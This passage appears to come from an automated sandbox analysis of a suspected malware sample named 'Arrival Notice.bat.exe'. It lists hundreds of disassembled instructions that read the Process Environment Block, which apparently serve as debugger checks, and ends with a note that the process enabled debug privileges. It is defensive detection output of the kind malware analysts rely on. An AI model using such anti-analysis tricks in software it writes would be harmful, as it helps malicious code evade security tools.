              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01570710 mov eax, dword ptr fs:[00000030h]8_2_01570710
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A0710 mov eax, dword ptr fs:[00000030h]8_2_015A0710
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AC700 mov eax, dword ptr fs:[00000030h]8_2_015AC700
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A273C mov eax, dword ptr fs:[00000030h]8_2_015A273C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A273C mov ecx, dword ptr fs:[00000030h]8_2_015A273C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A273C mov eax, dword ptr fs:[00000030h]8_2_015A273C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EC730 mov eax, dword ptr fs:[00000030h]8_2_015EC730
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AC720 mov eax, dword ptr fs:[00000030h]8_2_015AC720
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AC720 mov eax, dword ptr fs:[00000030h]8_2_015AC720
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157C7C0 mov eax, dword ptr fs:[00000030h]8_2_0157C7C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F07C3 mov eax, dword ptr fs:[00000030h]8_2_015F07C3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015747FB mov eax, dword ptr fs:[00000030h]8_2_015747FB
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015747FB mov eax, dword ptr fs:[00000030h]8_2_015747FB
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015927ED mov eax, dword ptr fs:[00000030h]8_2_015927ED
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015927ED mov eax, dword ptr fs:[00000030h]8_2_015927ED
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015927ED mov eax, dword ptr fs:[00000030h]8_2_015927ED
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FE7E1 mov eax, dword ptr fs:[00000030h]8_2_015FE7E1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016247A0 mov eax, dword ptr fs:[00000030h]8_2_016247A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161678E mov eax, dword ptr fs:[00000030h]8_2_0161678E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015707AF mov eax, dword ptr fs:[00000030h]8_2_015707AF
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163866E mov eax, dword ptr fs:[00000030h]8_2_0163866E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163866E mov eax, dword ptr fs:[00000030h]8_2_0163866E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158C640 mov eax, dword ptr fs:[00000030h]8_2_0158C640
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A2674 mov eax, dword ptr fs:[00000030h]8_2_015A2674
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AA660 mov eax, dword ptr fs:[00000030h]8_2_015AA660
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AA660 mov eax, dword ptr fs:[00000030h]8_2_015AA660
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2619 mov eax, dword ptr fs:[00000030h]8_2_015B2619
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158260B mov eax, dword ptr fs:[00000030h]8_2_0158260B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158260B mov eax, dword ptr fs:[00000030h]8_2_0158260B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158260B mov eax, dword ptr fs:[00000030h]8_2_0158260B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158260B mov eax, dword ptr fs:[00000030h]8_2_0158260B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158260B mov eax, dword ptr fs:[00000030h]8_2_0158260B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158260B mov eax, dword ptr fs:[00000030h]8_2_0158260B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158260B mov eax, dword ptr fs:[00000030h]8_2_0158260B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE609 mov eax, dword ptr fs:[00000030h]8_2_015EE609
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A6620 mov eax, dword ptr fs:[00000030h]8_2_015A6620
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A8620 mov eax, dword ptr fs:[00000030h]8_2_015A8620
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157262C mov eax, dword ptr fs:[00000030h]8_2_0157262C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158E627 mov eax, dword ptr fs:[00000030h]8_2_0158E627
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AA6C7 mov ebx, dword ptr fs:[00000030h]8_2_015AA6C7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AA6C7 mov eax, dword ptr fs:[00000030h]8_2_015AA6C7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE6F2 mov eax, dword ptr fs:[00000030h]8_2_015EE6F2
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE6F2 mov eax, dword ptr fs:[00000030h]8_2_015EE6F2
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE6F2 mov eax, dword ptr fs:[00000030h]8_2_015EE6F2
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE6F2 mov eax, dword ptr fs:[00000030h]8_2_015EE6F2
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F06F1 mov eax, dword ptr fs:[00000030h]8_2_015F06F1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F06F1 mov eax, dword ptr fs:[00000030h]8_2_015F06F1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01574690 mov eax, dword ptr fs:[00000030h]8_2_01574690
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01574690 mov eax, dword ptr fs:[00000030h]8_2_01574690
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A66B0 mov eax, dword ptr fs:[00000030h]8_2_015A66B0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AC6A6 mov eax, dword ptr fs:[00000030h]8_2_015AC6A6
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F0946 mov eax, dword ptr fs:[00000030h]8_2_015F0946
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01614978 mov eax, dword ptr fs:[00000030h]8_2_01614978
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01614978 mov eax, dword ptr fs:[00000030h]8_2_01614978
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FC97C mov eax, dword ptr fs:[00000030h]8_2_015FC97C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644940 mov eax, dword ptr fs:[00000030h]8_2_01644940
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B096E mov eax, dword ptr fs:[00000030h]8_2_015B096E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B096E mov edx, dword ptr fs:[00000030h]8_2_015B096E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B096E mov eax, dword ptr fs:[00000030h]8_2_015B096E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01596962 mov eax, dword ptr fs:[00000030h]8_2_01596962
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01596962 mov eax, dword ptr fs:[00000030h]8_2_01596962
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01596962 mov eax, dword ptr fs:[00000030h]8_2_01596962
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0160892B mov eax, dword ptr fs:[00000030h]8_2_0160892B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FC912 mov eax, dword ptr fs:[00000030h]8_2_015FC912
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01568918 mov eax, dword ptr fs:[00000030h]8_2_01568918
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01568918 mov eax, dword ptr fs:[00000030h]8_2_01568918
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE908 mov eax, dword ptr fs:[00000030h]8_2_015EE908
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE908 mov eax, dword ptr fs:[00000030h]8_2_015EE908
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F892A mov eax, dword ptr fs:[00000030h]8_2_015F892A
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A9D0 mov eax, dword ptr fs:[00000030h]8_2_0157A9D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A9D0 mov eax, dword ptr fs:[00000030h]8_2_0157A9D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A9D0 mov eax, dword ptr fs:[00000030h]8_2_0157A9D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A9D0 mov eax, dword ptr fs:[00000030h]8_2_0157A9D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A9D0 mov eax, dword ptr fs:[00000030h]8_2_0157A9D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A9D0 mov eax, dword ptr fs:[00000030h]8_2_0157A9D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A49D0 mov eax, dword ptr fs:[00000030h]8_2_015A49D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016069C0 mov eax, dword ptr fs:[00000030h]8_2_016069C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A29F9 mov eax, dword ptr fs:[00000030h]8_2_015A29F9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A29F9 mov eax, dword ptr fs:[00000030h]8_2_015A29F9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163A9D3 mov eax, dword ptr fs:[00000030h]8_2_0163A9D3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FE9E0 mov eax, dword ptr fs:[00000030h]8_2_015FE9E0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F89B3 mov esi, dword ptr fs:[00000030h]8_2_015F89B3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F89B3 mov eax, dword ptr fs:[00000030h]8_2_015F89B3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F89B3 mov eax, dword ptr fs:[00000030h]8_2_015F89B3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015709AD mov eax, dword ptr fs:[00000030h]8_2_015709AD
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015709AD mov eax, dword ptr fs:[00000030h]8_2_015709AD
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01574859 mov eax, dword ptr fs:[00000030h]8_2_01574859
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01574859 mov eax, dword ptr fs:[00000030h]8_2_01574859
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A0854 mov eax, dword ptr fs:[00000030h]8_2_015A0854
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01606870 mov eax, dword ptr fs:[00000030h]8_2_01606870
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01606870 mov eax, dword ptr fs:[00000030h]8_2_01606870
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01582840 mov ecx, dword ptr fs:[00000030h]8_2_01582840
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FE872 mov eax, dword ptr fs:[00000030h]8_2_015FE872
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FE872 mov eax, dword ptr fs:[00000030h]8_2_015FE872
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FC810 mov eax, dword ptr fs:[00000030h]8_2_015FC810
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161483A mov eax, dword ptr fs:[00000030h]8_2_0161483A
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161483A mov eax, dword ptr fs:[00000030h]8_2_0161483A
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AA830 mov eax, dword ptr fs:[00000030h]8_2_015AA830
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01592835 mov eax, dword ptr fs:[00000030h]8_2_01592835
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01592835 mov eax, dword ptr fs:[00000030h]8_2_01592835
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01592835 mov eax, dword ptr fs:[00000030h]8_2_01592835
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01592835 mov ecx, dword ptr fs:[00000030h]8_2_01592835
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01592835 mov eax, dword ptr fs:[00000030h]8_2_01592835
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01592835 mov eax, dword ptr fs:[00000030h]8_2_01592835
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163A8E4 mov eax, dword ptr fs:[00000030h]8_2_0163A8E4
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E8C0 mov eax, dword ptr fs:[00000030h]8_2_0159E8C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AC8F9 mov eax, dword ptr fs:[00000030h]8_2_015AC8F9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AC8F9 mov eax, dword ptr fs:[00000030h]8_2_015AC8F9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016408C0 mov eax, dword ptr fs:[00000030h]8_2_016408C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FC89D mov eax, dword ptr fs:[00000030h]8_2_015FC89D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01570887 mov eax, dword ptr fs:[00000030h]8_2_01570887
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01568B50 mov eax, dword ptr fs:[00000030h]8_2_01568B50
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01606B40 mov eax, dword ptr fs:[00000030h]8_2_01606B40
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01606B40 mov eax, dword ptr fs:[00000030h]8_2_01606B40
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163AB40 mov eax, dword ptr fs:[00000030h]8_2_0163AB40
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01618B42 mov eax, dword ptr fs:[00000030h]8_2_01618B42
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156CB7E mov eax, dword ptr fs:[00000030h]8_2_0156CB7E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01624B4B mov eax, dword ptr fs:[00000030h]8_2_01624B4B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01624B4B mov eax, dword ptr fs:[00000030h]8_2_01624B4B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161EB50 mov eax, dword ptr fs:[00000030h]8_2_0161EB50
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01642B57 mov eax, dword ptr fs:[00000030h]8_2_01642B57
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01642B57 mov eax, dword ptr fs:[00000030h]8_2_01642B57
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01642B57 mov eax, dword ptr fs:[00000030h]8_2_01642B57
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01642B57 mov eax, dword ptr fs:[00000030h]8_2_01642B57
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EEB1D mov eax, dword ptr fs:[00000030h]8_2_015EEB1D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EEB1D mov eax, dword ptr fs:[00000030h]8_2_015EEB1D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EEB1D mov eax, dword ptr fs:[00000030h]8_2_015EEB1D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EEB1D mov eax, dword ptr fs:[00000030h]8_2_015EEB1D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EEB1D mov eax, dword ptr fs:[00000030h]8_2_015EEB1D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EEB1D mov eax, dword ptr fs:[00000030h]8_2_015EEB1D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EEB1D mov eax, dword ptr fs:[00000030h]8_2_015EEB1D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EEB1D mov eax, dword ptr fs:[00000030h]8_2_015EEB1D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EEB1D mov eax, dword ptr fs:[00000030h]8_2_015EEB1D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01638B28 mov eax, dword ptr fs:[00000030h]8_2_01638B28
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01638B28 mov eax, dword ptr fs:[00000030h]8_2_01638B28
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644B00 mov eax, dword ptr fs:[00000030h]8_2_01644B00
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159EB20 mov eax, dword ptr fs:[00000030h]8_2_0159EB20
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159EB20 mov eax, dword ptr fs:[00000030h]8_2_0159EB20
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01590BCB mov eax, dword ptr fs:[00000030h]8_2_01590BCB
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01590BCB mov eax, dword ptr fs:[00000030h]8_2_01590BCB
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01590BCB mov eax, dword ptr fs:[00000030h]8_2_01590BCB
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01570BCD mov eax, dword ptr fs:[00000030h]8_2_01570BCD
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01570BCD mov eax, dword ptr fs:[00000030h]8_2_01570BCD
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01570BCD mov eax, dword ptr fs:[00000030h]8_2_01570BCD
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159EBFC mov eax, dword ptr fs:[00000030h]8_2_0159EBFC
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01578BF0 mov eax, dword ptr fs:[00000030h]8_2_01578BF0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01578BF0 mov eax, dword ptr fs:[00000030h]8_2_01578BF0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01578BF0 mov eax, dword ptr fs:[00000030h]8_2_01578BF0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FCBF0 mov eax, dword ptr fs:[00000030h]8_2_015FCBF0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161EBD0 mov eax, dword ptr fs:[00000030h]8_2_0161EBD0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01624BB0 mov eax, dword ptr fs:[00000030h]8_2_01624BB0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01624BB0 mov eax, dword ptr fs:[00000030h]8_2_01624BB0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580BBE mov eax, dword ptr fs:[00000030h]8_2_01580BBE
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580BBE mov eax, dword ptr fs:[00000030h]8_2_01580BBE
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161EA60 mov eax, dword ptr fs:[00000030h]8_2_0161EA60
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580A5B mov eax, dword ptr fs:[00000030h]8_2_01580A5B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580A5B mov eax, dword ptr fs:[00000030h]8_2_01580A5B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01576A50 mov eax, dword ptr fs:[00000030h]8_2_01576A50
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01576A50 mov eax, dword ptr fs:[00000030h]8_2_01576A50
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01576A50 mov eax, dword ptr fs:[00000030h]8_2_01576A50
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01576A50 mov eax, dword ptr fs:[00000030h]8_2_01576A50
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01576A50 mov eax, dword ptr fs:[00000030h]8_2_01576A50
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01576A50 mov eax, dword ptr fs:[00000030h]8_2_01576A50
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01576A50 mov eax, dword ptr fs:[00000030h]8_2_01576A50
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015ECA72 mov eax, dword ptr fs:[00000030h]8_2_015ECA72
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015ECA72 mov eax, dword ptr fs:[00000030h]8_2_015ECA72
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015ACA6F mov eax, dword ptr fs:[00000030h]8_2_015ACA6F
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015ACA6F mov eax, dword ptr fs:[00000030h]8_2_015ACA6F
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015ACA6F mov eax, dword ptr fs:[00000030h]8_2_015ACA6F
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FCA11 mov eax, dword ptr fs:[00000030h]8_2_015FCA11
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01594A35 mov eax, dword ptr fs:[00000030h]8_2_01594A35
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01594A35 mov eax, dword ptr fs:[00000030h]8_2_01594A35
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159EA2E mov eax, dword ptr fs:[00000030h]8_2_0159EA2E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015ACA24 mov eax, dword ptr fs:[00000030h]8_2_015ACA24
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01570AD0 mov eax, dword ptr fs:[00000030h]8_2_01570AD0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A4AD0 mov eax, dword ptr fs:[00000030h]8_2_015A4AD0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A4AD0 mov eax, dword ptr fs:[00000030h]8_2_015A4AD0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015C6ACC mov eax, dword ptr fs:[00000030h]8_2_015C6ACC
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015C6ACC mov eax, dword ptr fs:[00000030h]8_2_015C6ACC
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015C6ACC mov eax, dword ptr fs:[00000030h]8_2_015C6ACC
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AAAEE mov eax, dword ptr fs:[00000030h]8_2_015AAAEE
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AAAEE mov eax, dword ptr fs:[00000030h]8_2_015AAAEE
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A8A90 mov edx, dword ptr fs:[00000030h]8_2_015A8A90
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157EA80 mov eax, dword ptr fs:[00000030h]8_2_0157EA80
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157EA80 mov eax, dword ptr fs:[00000030h]8_2_0157EA80
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157EA80 mov eax, dword ptr fs:[00000030h]8_2_0157EA80
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157EA80 mov eax, dword ptr fs:[00000030h]8_2_0157EA80
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess token adjusted: DebugJump to behavior
